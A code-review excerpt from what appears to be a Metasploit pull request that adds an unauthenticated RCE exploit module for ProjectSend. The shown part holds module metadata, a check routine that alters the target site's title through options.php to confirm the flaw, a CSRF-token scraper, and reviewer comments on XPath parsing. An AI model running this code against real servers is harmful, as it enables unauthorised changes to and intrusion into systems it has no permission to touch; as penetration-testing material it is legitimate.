modules/exploits/linux/http/projectsend_unauth_rce.rb

```diff
@@ -0,0 +1,399 @@
+          ['URL', 'https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf'],
+        ],
+        'DisclosureDate' => '2024-07-19',
+        'DefaultTarget' => 0,
+        'Targets' => [
+          ['ProjectSend r1335 - r1605', { 'Platform' => 'php', 'Arch' => ARCH_PHP }]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new(
+          'TARGETURI',
+          [true, 'The TARGETURI for ProjectSend', '/']
+        )
+      ]
+    )
+  end
+
+  def check
+    csrf_token = get_csrf_token
+
+    # Obtain the current title of the website
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')
+    })
+
+    title_regex = %r{<title>.*?&raquo;\s+(.*?)</title>}
+    original_title = res.body[title_regex, 1]
+
+    # Generate a new title for the website
+    random_new_title = Rex::Text.rand_text_alphanumeric(8)
+
+    # Test if version is vulnerable, by attempting to change the title of the install
+    params = {
+      'csrf_token' => csrf_token,
+      'section' => 'general',
+      'this_install_title' => random_new_title
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),
+      'keep_cookie' => true,
+      'vars_post' => params
+    })
+
+    unless res
+      fail_with(Failure::NoAccess, 'Failed to connect to the provided URL')
+    end
+
+    # GET request to check if the title updated
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')
+    })
+
+    # Extract new title for comparison
+    updated_title = res.body[title_regex, 1]
+
+    if updated_title != random_new_title
+      return CheckCode::Safe
+    end
+
+    # If the title was changed, it is vulnerable and we should restore the original title
+    params = {
+      'csrf_token' => csrf_token,
+      'section' => 'general',
+      'this_install_title' => original_title
+    }
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),
+      'keep_cookie' => true,
+      'vars_post' => params
+    })
+
+    return CheckCode::Vulnerable
+  end
+
+  def get_csrf_token
+    vprint_status('Extracting CSRF token...')
+    # Make sure we start from a request with no cookies
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),
+      'keep_cookies' => true
+    })
+
+    # Obtain CSRF token
+    csrf_regex = /csrf_token" value="([^"]+)"/
+    csrf_token = res.body[csrf_regex, 1]
```

Comment:
```suggestion
    csrf_token = Nokogiri::HTML(res.body).xpath('//csrf_token[1][@value]')&.text
```

Something like this might/should work and be more robust

Reply:
```ruby
csrf_token = get_html_document.xpath('//csrf_token[1][@value]')&.text
```

Reply:
I modified the XPath expression a bit because the example wasn't working as expected.